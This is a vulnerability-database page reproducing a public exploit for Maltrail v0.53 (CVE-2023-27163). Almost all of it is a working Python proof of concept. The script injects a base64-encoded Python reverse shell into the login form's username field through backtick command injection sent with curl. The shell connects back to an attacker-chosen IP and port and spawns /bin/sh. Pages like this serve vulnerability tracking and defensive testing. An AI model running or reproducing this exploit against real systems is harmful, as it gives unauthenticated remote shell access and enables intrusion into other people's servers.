Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Maltrail 0.53 Remote Code Execution

Related Vulnerabilities: CVE-2023-27163  
Publish Date: 11 Aug 2023
Author: Iyaad Luqman K
Source 
                # Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)
# Exploit Author: Iyaad Luqman K (init_6)
# Application: Maltrail v0.53
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-27163


# PoC
import sys;
import os;
import base64;

def main():
  listening_IP = None
  listening_PORT = None
  target_URL = None

  if len(sys.argv) != 4:
    print("Error. Needs listening IP, PORT and target URL.")
    return(-1)
  
  listening_IP = sys.argv[1]
  listening_PORT = sys.argv[2]
  target_URL = sys.argv[3] + "/login"
  print("Running exploit on " + str(target_URL))
  curl_cmd(listening_IP, listening_PORT, target_URL)

def curl_cmd(my_ip, my_port, target_url):
  payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
  encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64
  command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"
  os.system(command)

if __name__ == "__main__":
  main()
            
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started